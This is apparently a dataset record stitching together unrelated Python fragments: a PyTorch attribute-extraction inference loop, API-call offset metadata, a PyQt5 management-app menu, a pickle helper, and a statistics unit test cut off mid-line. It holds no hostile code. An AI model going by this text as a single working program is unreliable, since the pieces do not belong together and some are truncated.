_total_labels, _total_preds = torch.LongTensor(), torch.LongTensor()
for inputs, attention_masks, labels in dl:
with torch.no_grad():
model.to(device).eval()
output = model(inputs.to(device), attention_masks.to(device), labels.to(device))
probs = torch.stack(output[1]).transpose(0, 1).cpu()
preds = probs.argmax(axis=-1)
_total_labels = torch.cat([_total_labels, labels.transpose(0, 1).reshape(labels.shape[1], -1)], axis=1)
_total_preds = torch.cat([_total_preds, preds.transpose(0, 1).reshape(preds.shape[1], -1)], axis=1)
total_preds = _total_preds[(_total_labels != -1).nonzero(as_tuple=True)].reshape(_total_preds.shape[0], -1)
bio_preds = decode_attr_bio(total_preds.tolist(), idx2attr, idx2bio)
new_char_idx_dict = {page_dict['new_char_idx']:page_dict \
for page_dict in ds.df_new[page_id].to_dict('records')}
for attr_idx, bios in enumerate(bio_preds):
pre_bio = 'O'
result = {'page_id':page_id, 'title':ds.page2title[page_id], \
'attribute':idx2attr[attr_idx], 'text_offset':{}}
for idx, bio in enumerate(bios):
bio = bio.split('-')[0]
ope = operate_bio(pre_bio, bio)
if ope['insert'] == True:
result_list.append(result)
result = {'page_id':page_id, 'title':ds.page2title[page_id], \
'attribute':idx2attr[attr_idx], 'text_offset':{}}
if ope['start'] == True:
result['text_offset']['start'] = {
'line_id': new_char_idx_dict[idx]['line_id'],
'offset': new_char_idx_dict[idx]['offset']
}
result['text_offset']['text'] = new_char_idx_dict[idx]['char']
if ope['end'] == True:
result['text_offset']['end'] = {
'line_id': new_char_idx_dict[idx]['line_id'],
'offset': new_char_idx_dict[idx]['offset']+1
}
if ope['start'] == False:
result['text_offset']['text'] += new_char_idx_dict[idx]['char']
pre_bio = bio
if bio in ['B', 'I']:
result_list.append(result)
bar.update(1)
df_result = pd.DataFrame(result_list)
df_result.to_json(OUTPUT_PATH+'predict.json', orient='records', force_ascii=False, lines=True)
|
[
"argparse.ArgumentParser",
"shiba.CodepointTokenizer",
"utils.set_seed",
"transformers.AutoModel.from_pretrained",
"glob.glob",
"torch.no_grad",
"pandas.DataFrame",
"torch.utils.data.DataLoader",
"torch.load",
"shiba.Shiba",
"transformers.AutoTokenizer.from_pretrained",
"torch.cuda.is_available",
"utils.operate_bio",
"datasets.CharbertDataset",
"json.load",
"torch.stack",
"torch.LongTensor",
"pandas.read_json",
"datasets.ShibaDataset",
"shiba.get_pretrained_state_dict"
] |
[((580, 605), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (603, 605), False, 'import argparse\n'), ((1655, 1669), 'utils.set_seed', 'set_seed', (['SEED'], {}), '(SEED)\n', (1663, 1669), False, 'from utils import epoch_time, decode_attr_bio, operate_bio, set_seed\n'), ((1805, 1901), 'pandas.read_json', 'pd.read_json', (["(INPUT_ANNOTATION_PATH + CATEGORY + '_dist.json')"], {'orient': '"""records"""', 'lines': '(True)'}), "(INPUT_ANNOTATION_PATH + CATEGORY + '_dist.json', orient=\n 'records', lines=True)\n", (1817, 1901), True, 'import pandas as pd\n'), ((6269, 6294), 'pandas.DataFrame', 'pd.DataFrame', (['result_list'], {}), '(result_list)\n', (6281, 6294), True, 'import pandas as pd\n'), ((2648, 2695), 'transformers.AutoTokenizer.from_pretrained', 'AutoTokenizer.from_pretrained', (['pretrained_model'], {}), '(pretrained_model)\n', (2677, 2695), False, 'from transformers import AutoTokenizer, AutoModel\n'), ((2711, 2754), 'transformers.AutoModel.from_pretrained', 'AutoModel.from_pretrained', (['pretrained_model'], {}), '(pretrained_model)\n', (2736, 2754), False, 'from transformers import AutoTokenizer, AutoModel\n'), ((2893, 2913), 'shiba.CodepointTokenizer', 'CodepointTokenizer', ([], {}), '()\n', (2911, 2913), False, 'from shiba import Shiba, CodepointTokenizer, get_pretrained_state_dict\n'), ((2930, 2937), 'shiba.Shiba', 'Shiba', ([], {}), '()\n', (2935, 2937), False, 'from shiba import Shiba, CodepointTokenizer, get_pretrained_state_dict\n'), ((3129, 3170), 'torch.load', 'torch.load', (["(OUTPUT_PATH + 'best_model.pt')"], {}), "(OUTPUT_PATH + 'best_model.pt')\n", (3139, 3170), False, 'import torch\n'), ((3637, 3697), 'torch.utils.data.DataLoader', 'DataLoader', (['ds'], {'batch_size': 'BATCH_SIZE', 'collate_fn': 'collate_fn'}), '(ds, batch_size=BATCH_SIZE, collate_fn=collate_fn)\n', (3647, 3697), False, 'from torch.utils.data import DataLoader\n'), ((1560, 1572), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1569, 1572), False, 'import json\n'), ((1717, 1742), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1740, 1742), False, 'import torch\n'), ((2968, 2995), 'shiba.get_pretrained_state_dict', 'get_pretrained_state_dict', ([], {}), '()\n', (2993, 2995), False, 'from shiba import Shiba, CodepointTokenizer, get_pretrained_state_dict\n'), ((3418, 3504), 'datasets.CharbertDataset', 'CharbertDataset', (['page2plain', 'tokenizer', 'attr2idx', 'bio2idx', 'MAX_LENGTH', 'BLOCK', 'None'], {}), '(page2plain, tokenizer, attr2idx, bio2idx, MAX_LENGTH, BLOCK,\n None)\n', (3433, 3504), False, 'from datasets import CharbertDataset, ShibaDataset, collate_fn\n'), ((3544, 3623), 'datasets.ShibaDataset', 'ShibaDataset', (['page2plain', 'tokenizer', 'attr2idx', 'bio2idx', 'MAX_LENGTH', 'BLOCK', 'None'], {}), '(page2plain, tokenizer, attr2idx, bio2idx, MAX_LENGTH, BLOCK, None)\n', (3556, 3623), False, 'from datasets import CharbertDataset, ShibaDataset, collate_fn\n'), ((3745, 3763), 'torch.LongTensor', 'torch.LongTensor', ([], {}), '()\n', (3761, 3763), False, 'import torch\n'), ((3765, 3783), 'torch.LongTensor', 'torch.LongTensor', ([], {}), '()\n', (3781, 3783), False, 'import torch\n'), ((2197, 2242), 'glob.glob', 'glob.glob', (["(INPUT_PLAIN_PATH + CATEGORY + '/*')"], {}), "(INPUT_PLAIN_PATH + CATEGORY + '/*')\n", (2206, 2242), False, 'import glob\n'), ((3852, 3867), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3865, 3867), False, 'import torch\n'), ((5092, 5117), 'utils.operate_bio', 'operate_bio', (['pre_bio', 'bio'], {}), '(pre_bio, bio)\n', (5103, 5117), False, 'from utils import epoch_time, decode_attr_bio, operate_bio, set_seed\n'), ((4046, 4068), 'torch.stack', 'torch.stack', (['output[1]'], {}), '(output[1])\n', (4057, 4068), False, 'import torch\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# theme and sys for linking signals
import sys
# other forms
import managerMenu as managermenu
import staffForm as staffform
import stockForm as stockform
import treatmentsForm as treatmentsform
import appointmentForm as appointmentform
import chartForm as chartform
import customerForm as customerform
# GUI libraries
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMainWindow
from PyQt5.QtCore import pyqtSignal, QObject
# Theme
import qdarkstyle
class Ui_MainMenu(QMainWindow, QObject):
valueChange = pyqtSignal(int)
def setupUi(self, MainMenu):
# 'global' information
MainMenu.setObjectName("MainMenu")
MainMenu.resize(1280, 720)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainMenu.sizePolicy().hasHeightForWidth())
MainMenu.setSizePolicy(sizePolicy)
self.centralWidget = QtWidgets.QWidget(MainMenu)
self.centralWidget.setObjectName("centralWidget")
# True is manager
# False is staff
if sys.argv[2] == 'True':
self.accessLevel = True
else:
self.accessLevel = False
self.userLoggedIn = sys.argv[1]
# creating navigation buttons
def navButtons(self):
self.navManagerMenu = QtWidgets.QPushButton(self.centralWidget)
self.navManagerMenu.setGeometry(QtCore.QRect(11, 40, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navManagerMenu.setFont(font)
self.navManagerMenu.setObjectName("navManagerMenu")
self.navManagerMenu.setEnabled(self.accessLevel)
self.navCharts = QtWidgets.QPushButton(self.centralWidget)
self.navCharts.setGeometry(QtCore.QRect(10, 240, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navCharts.setFont(font)
self.navCharts.setObjectName("navCharts")
self.navAppointments = QtWidgets.QPushButton(self.centralWidget)
self.navAppointments.setGeometry(QtCore.QRect(10, 160, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navAppointments.setFont(font)
self.navAppointments.setObjectName("navAppointments")
self.navCustomers = QtWidgets.QPushButton(self.centralWidget)
self.navCustomers.setGeometry(QtCore.QRect(10, 120, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navCustomers.setFont(font)
self.navCustomers.setObjectName("navCustomers")
self.navStaff = QtWidgets.QPushButton(self.centralWidget)
self.navStaff.setGeometry(QtCore.QRect(10, 80, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navStaff.setFont(font)
self.navStaff.setObjectName("navStaff")
self.navStaff.setEnabled(self.accessLevel)
self.navStock = QtWidgets.QPushButton(self.centralWidget)
self.navStock.setGeometry(QtCore.QRect(10, 200, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navStock.setFont(font)
self.navStock.setObjectName("navStock")
self.navTreatments = QtWidgets.QPushButton(self.centralWidget)
self.navTreatments.setGeometry(QtCore.QRect(10, 280, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navTreatments.setFont(font)
self.navTreatments.setObjectName("navTreatments")
# whos logged in
self.user = QtWidgets.QLabel(self.centralWidget)
self.user.setGeometry(QtCore.QRect(10, 320, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial Black")
self.user.setFont(font)
self.user.setObjectName("user")
self.label = QtWidgets.QLabel(self.centralWidget)
self.label.setGeometry(QtCore.QRect(10, 11, 101, 17))
font = QtGui.QFont()
font.setFamily("Arial Black")
self.label.setFont(font)
self.label.setObjectName("label")
self.stackedWidget = QtWidgets.QStackedWidget(self.centralWidget)
self.stackedWidget.setGeometry(QtCore.QRect(140, 10, 1141, 691))
font = QtGui.QFont()
font.setFamily("Arial")
self.stackedWidget.setFont(font)
self.stackedWidget.setObjectName("stackedWidget")
# creation code
navButtons(self)
managermenu.createManagerMenu(self)
chartform.createChartForm(self)
staffform.createStaffForm(self)
customerform.createCustomerForm(self)
appointmentform.createAppointmentForm(self)
stockform.createStockForm(self)
treatmentsform.createTreatmentsForm(self)
# main window config
MainMenu.setCentralWidget(self.centralWidget)
self.mainToolBar = QtWidgets.QToolBar(MainMenu)
self.mainToolBar.setObjectName("mainToolBar")
MainMenu.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)
self.statusBar = QtWidgets.QStatusBar(MainMenu)
self.statusBar.setObjectName("statusBar")
MainMenu.setStatusBar(self.statusBar)
self.retranslateUi(MainMenu)
if self.accessLevel is True:
self.stackedWidget.setCurrentIndex(0)
else:
self.stackedWidget.setCurrentIndex(4)
QtCore.QMetaObject.connectSlotsByName(MainMenu)
def navigation(self):
# connecting the navigation buttons to the stacked widget
self.navManagerMenu.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(0))
self.navCharts.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(1))
self.navStaff.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(2))
self.navCustomers.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(3))
self.navAppointments.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(4))
self.navStock.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(5))
self.navTreatments.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(6))
def retranslateUi(self, MainMenu):
# adding text to all the labels
_translate = QtCore.QCoreApplication.translate
MainMenu.setWindowTitle(_translate("MainMenu", "MainMenu"))
self.navManagerMenu.setText(_translate("MainMenu", "ManagerMenu"))
self.navCharts.setText(_translate("MainMenu", "Charts"))
self.navAppointments.setText(_translate("MainMenu", "Appointments"))
self.navCustomers.setText(_translate("MainMenu", "Customers"))
self.navStaff.setText(_translate("MainMenu", "Staff"))
self.navStock.setText(_translate("MainMenu", "Stock"))
self.navTreatments.setText(_translate("MainMenu", "Treatments"))
self.label.setText(_translate("MainMenu", "Navigation"))
self.label_5.setText(_translate("MainMenu", "Manager Menu"))
self.label_notifications.setText(_translate("MainMenu", "Notifications"))
self.label_7.setText(_translate("MainMenu", "Backup"))
self.btnBackup.setText(_translate("MainMenu", "Backup"))
self.user.setText(_translate("MainMenu", sys.argv[1]))
self.user.setAlignment(QtCore.Qt.AlignCenter)
self.label_4.setText(_translate("MainMenu", "To"))
self.label_2.setText(_translate("MainMenu", "Chart Type"))
self.cmbChartType.setItemText(0, _translate("MainMenu", "Most popular treatment"))
self.cmbChartType.setItemText(1, _translate("MainMenu", "Income"))
self.cmbChartType.setItemText(2, _translate("MainMenu", "Outgoing per stock type"))
self.label_3.setText(_translate("MainMenu", "From"))
self.btnChartCreate.setText(_translate("MainMenu", "Create"))
self.label_31.setText(_translate("MainMenu", "Charts"))
self.label_8.setText(_translate("MainMenu", "Staff Menu"))
self.label_9.setText(_translate("MainMenu", "Add new staff member"))
self.label_10.setText(_translate("MainMenu", "First name"))
self.label_staffsex.setText(_translate("MainMenu", "Staff sex"))
self.label_11.setText(_translate("MainMenu", "Surname"))
self.label_12.setText(_translate("MainMenu", "Username"))
self.label_13.setText(_translate("MainMenu", "Password"))
self.label_14.setText(_translate("MainMenu", "Is this user a manager?"))
self.checkBoxAdmin.setText(_translate("MainMenu", "Yes"))
self.label_15.setText(_translate("MainMenu", "Date of birth"))
self.label_16.setText(_translate("MainMenu", "StaffID"))
self.btnSaveStaff.setText(_translate("MainMenu", "Save"))
self.label_17.setText(_translate("MainMenu", "Search"))
self.btnStaffCancel.setText(_translate("MainMenu", "Cancel"))
self.label_18.setText(_translate("MainMenu", "Add new Customer"))
self.label_19.setText(_translate("MainMenu", "Email"))
self.label_20.setText(_translate("MainMenu", "Surname"))
self.label_21.setText(_translate("MainMenu", "Search"))
self.label_22.setText(_translate("MainMenu", "CustomerID"))
self.btnSaveCustomer.setText(_translate("MainMenu", "Save"))
self.label_23.setText(_translate("MainMenu", "Date of birth"))
self.label_24.setText(_translate("MainMenu", "Primary Contact info"))
self.label_25.setText(_translate("MainMenu", "Phone Number"))
self.label_26.setText(_translate("MainMenu", "First name"))
self.cmbCustomerContact.setItemText(0, _translate("MainMenu", "Phone number"))
self.cmbCustomerContact.setItemText(1, _translate("MainMenu", "Email address"))
self.label_27.setText(_translate("MainMenu", "Address"))
self.label_28.setText(_translate("MainMenu", "Postcode"))
self.label_29.setText(_translate("MainMenu", "Allergies"))
self.label_30.setText(_translate("MainMenu", "Customers"))
self.cmbCustomerSex.setItemText(0, _translate("MainMenu", "Male"))
self.cmbCustomerSex.setItemText(1, _translate("MainMenu", "Female"))
self.label_75.setText(_translate("MainMenu", "Sex"))
self.btnCustomerCancel.setText(_translate("MainMenu", "Cancel"))
self.label_62.setText(_translate("MainMenu", "Search"))
self.label_63.setText(_translate("MainMenu", "Date"))
self.label_65.setText(_translate("MainMenu", "AppointmentID"))
self.label_66.setText(_translate("MainMenu", "Customer"))
self.label_67.setText(_translate("MainMenu", "Add new Appointment"))
self.label_68.setText(_translate("MainMenu", "Amount Paid"))
self.label_70.setText(_translate("MainMenu", "Time"))
self.btnSaveAppointment.setText(_translate("MainMenu", "Save"))
self.label_72.setText(_translate("MainMenu", "Treatment"))
self.label_73.setText(_translate("MainMenu", "Staff"))
self.label_74.setText(_translate("MainMenu", "Appointments"))
self.label_64.setText(_translate("MainMenu", "ยฃ"))
self.label_69.setText(_translate("MainMenu", "ยฃ"))
self.label_71.setText(_translate("MainMenu", "Amount Due"))
self.btnAppointmentCancel.setText(_translate("MainMenu", "Cancel"))
self.label_76.setText(_translate("MainMenu", "Comment"))
self.label_77.setText(_translate("MainMenu", "Stock alert level"))
self.label_78.setText(_translate("MainMenu", "Add new Stock"))
self.label_81.setText(_translate("MainMenu", "StockID"))
self.btnSaveStock.setText(_translate("MainMenu", "Save"))
self.label_83.setText(_translate("MainMenu", "Amount left"))
self.label_84.setText(_translate("MainMenu", "Name"))
self.label_86.setText(_translate("MainMenu", "Search"))
self.btnStockCancel.setText(_translate("MainMenu", "Cancel"))
self.label_87.setText(_translate("MainMenu", "ยฃ"))
self.label_88.setText(_translate("MainMenu", "Price"))
self.label_89.setText(_translate("MainMenu", "Stock"))
# labels for treatmentsform
self.label_90.setText(_translate("MainMenu", "ยฃ"))
self.label_91.setText(_translate("MainMenu", "Search"))
self.label_92.setText(_translate("MainMenu", "Price"))
self.label_79.setText(_translate("MainMenu", "Stock amount to use"))
self.label_80.setText(_translate("MainMenu", "Add new Treatments"))
self.label_85.setText(_translate("MainMenu", "Name"))
self.label_82.setText(_translate("MainMenu", "TreatmentID"))
self.label_93.setText(_translate("MainMenu", "Stock name"))
self.btnTreatmentCancel.setText(_translate("MainMenu", "Cancel"))
self.btnSaveTreatment.setText(_translate("MainMenu", "Save"))
self.btnTreatmentAddStock.setText(_translate("MainMenu", "Add"))
self.label_94.setText(_translate("MainMenu", "Stock to use"))
self.label_95.setText(_translate("MainMenu", "Treatments"))
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
MainMenu = QtWidgets.QMainWindow()
ui = Ui_MainMenu()
ui.setupUi(MainMenu)
ui.navigation()
icon = QtGui.QIcon('database/company.png')
MainMenu.setWindowIcon(QtGui.QIcon(icon))
MainMenu.show()
sys.exit(app.exec_())
|
[
"PyQt5.QtCore.pyqtSignal",
"treatmentsForm.createTreatmentsForm",
"PyQt5.QtWidgets.QSizePolicy",
"PyQt5.QtWidgets.QPushButton",
"customerForm.createCustomerForm",
"appointmentForm.createAppointmentForm",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QToolBar",
"managerMenu.createManagerMenu",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QWidget",
"qdarkstyle.load_stylesheet_pyqt5",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QMainWindow",
"chartForm.createChartForm",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtGui.QIcon",
"staffForm.createStaffForm",
"PyQt5.QtWidgets.QStatusBar",
"PyQt5.QtGui.QFont",
"PyQt5.QtWidgets.QStackedWidget",
"stockForm.createStockForm"
] |
[((589, 604), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', (['int'], {}), '(int)\n', (599, 604), False, 'from PyQt5.QtCore import pyqtSignal, QObject\n'), ((13442, 13474), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (13464, 13474), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((13549, 13572), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (13570, 13572), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((13654, 13689), 'PyQt5.QtGui.QIcon', 'QtGui.QIcon', (['"""database/company.png"""'], {}), "('database/company.png')\n", (13665, 13689), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((770, 849), 'PyQt5.QtWidgets.QSizePolicy', 'QtWidgets.QSizePolicy', (['QtWidgets.QSizePolicy.Fixed', 'QtWidgets.QSizePolicy.Fixed'], {}), '(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n', (791, 849), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1086, 1113), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainMenu'], {}), '(MainMenu)\n', (1103, 1113), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4848, 4883), 'managerMenu.createManagerMenu', 'managermenu.createManagerMenu', (['self'], {}), '(self)\n', (4877, 4883), True, 'import managerMenu as managermenu\n'), ((4892, 4923), 'chartForm.createChartForm', 'chartform.createChartForm', (['self'], {}), '(self)\n', (4917, 4923), True, 'import chartForm as chartform\n'), ((4932, 4963), 'staffForm.createStaffForm', 'staffform.createStaffForm', (['self'], {}), '(self)\n', (4957, 4963), True, 'import staffForm as staffform\n'), ((4972, 5009), 'customerForm.createCustomerForm', 'customerform.createCustomerForm', (['self'], {}), '(self)\n', (5003, 5009), True, 'import customerForm as customerform\n'), ((5018, 5061), 'appointmentForm.createAppointmentForm', 'appointmentform.createAppointmentForm', (['self'], {}), '(self)\n', (5055, 5061), True, 'import appointmentForm as appointmentform\n'), ((5070, 5101), 'stockForm.createStockForm', 'stockform.createStockForm', (['self'], {}), '(self)\n', (5095, 5101), True, 'import stockForm as stockform\n'), ((5110, 5151), 'treatmentsForm.createTreatmentsForm', 'treatmentsform.createTreatmentsForm', (['self'], {}), '(self)\n', (5145, 5151), True, 'import treatmentsForm as treatmentsform\n'), ((5272, 5300), 'PyQt5.QtWidgets.QToolBar', 'QtWidgets.QToolBar', (['MainMenu'], {}), '(MainMenu)\n', (5290, 5300), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5452, 5482), 'PyQt5.QtWidgets.QStatusBar', 'QtWidgets.QStatusBar', (['MainMenu'], {}), '(MainMenu)\n', (5472, 5482), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5792, 5839), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainMenu'], {}), '(MainMenu)\n', (5829, 5839), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((13497, 13531), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (13529, 13531), False, 'import qdarkstyle\n'), ((13717, 13734), 'PyQt5.QtGui.QIcon', 'QtGui.QIcon', (['icon'], {}), '(icon)\n', (13728, 13734), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1492, 1533), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (1513, 1533), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1628, 1641), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (1639, 1641), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1887, 1928), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (1908, 1928), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2019, 2032), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2030, 2032), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2208, 2249), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (2229, 2249), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2346, 2359), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2357, 2359), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2550, 2591), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (2571, 2591), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2685, 2698), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2696, 2698), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2868, 2909), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (2889, 2909), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2998, 3011), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3009, 3011), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3232, 3273), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (3253, 3273), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3363, 3376), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3374, 3376), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3539, 3580), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (3560, 3580), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3675, 3688), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3686, 3688), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3887, 3923), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralWidget'], {}), '(self.centralWidget)\n', (3903, 3923), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4009, 4022), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4020, 4022), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4179, 4215), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralWidget'], {}), '(self.centralWidget)\n', (4195, 4215), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4301, 4314), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4312, 4314), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4482, 4526), 'PyQt5.QtWidgets.QStackedWidget', 'QtWidgets.QStackedWidget', (['self.centralWidget'], {}), '(self.centralWidget)\n', (4506, 4526), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4623, 4636), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4634, 4636), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1578, 1607), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(11)', '(40)', '(121)', '(29)'], {}), '(11, 40, 121, 29)\n', (1590, 1607), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1968, 1998), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(240)', '(121)', '(29)'], {}), '(10, 240, 121, 29)\n', (1980, 1998), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2295, 2325), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(160)', '(121)', '(29)'], {}), '(10, 160, 121, 29)\n', (2307, 2325), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2634, 2664), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(120)', '(121)', '(29)'], {}), '(10, 120, 121, 29)\n', (2646, 2664), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2948, 2977), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(80)', '(121)', '(29)'], {}), '(10, 80, 121, 29)\n', (2960, 2977), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3312, 3342), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(200)', '(121)', '(29)'], {}), '(10, 200, 121, 29)\n', (3324, 3342), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3624, 3654), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(280)', '(121)', '(29)'], {}), '(10, 280, 121, 29)\n', (3636, 3654), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3958, 3988), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(320)', '(121)', '(29)'], {}), '(10, 320, 121, 29)\n', (3970, 3988), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4251, 4280), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(11)', '(101)', '(17)'], {}), '(10, 11, 101, 17)\n', (4263, 4280), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4570, 4602), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(140)', '(10)', '(1141)', '(691)'], {}), '(140, 10, 1141, 691)\n', (4582, 4602), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')]
|
import cPickle
def load_pickle(filename):
pickled = open(filename, 'rb')
data = cPickle.load(pickled)
return data
def export_pickle(filename, the_object):
pickle_file = open(filename, 'w')
cPickle.dump(the_object, pickle_file)
pickle_file.close()
|
[
"cPickle.dump",
"cPickle.load"
] |
[((91, 112), 'cPickle.load', 'cPickle.load', (['pickled'], {}), '(pickled)\n', (103, 112), False, 'import cPickle\n'), ((214, 251), 'cPickle.dump', 'cPickle.dump', (['the_object', 'pickle_file'], {}), '(the_object, pickle_file)\n', (226, 251), False, 'import cPickle\n')]
|
# Licensed under an MIT open source license - see LICENSE
'''
Test functions for Kurtosis
'''
from unittest import TestCase
import numpy as np
import numpy.testing as npt
from ..statistics import StatMoments, StatMomentsDistance
from ._testing_data import \
dataset1, dataset2, computed_data, computed_distances
class TestMoments(TestCase):
def setUp(self):
self.dataset1 = dataset1
self.dataset2 = dataset2
def test_moments(self):
self.tester = StatMoments(dataset1["integrated_intensity"][0], 5)
self.tester.run()
assert np.allclose(self.tester.kurtosis_hist[1],
computed_data['kurtosis_val'])
assert np.allclose(self.tester.skewness_hist[1],
computed_data['skewness_val'])
def test_moment_distance(self):
self.tester_dist = \
StatMomentsDistance(dataset1["integrated_intensity"][0],
dataset2["integrated_intensity"][0], 5)
self.tester_dist.distance_metric()
npt.assert_almost_equal(self.tester_dist.kurtosis_distance,
computed_distances['kurtosis_distance'])
npt.assert_almost_equal(self.tester_dist.skewness_distance,
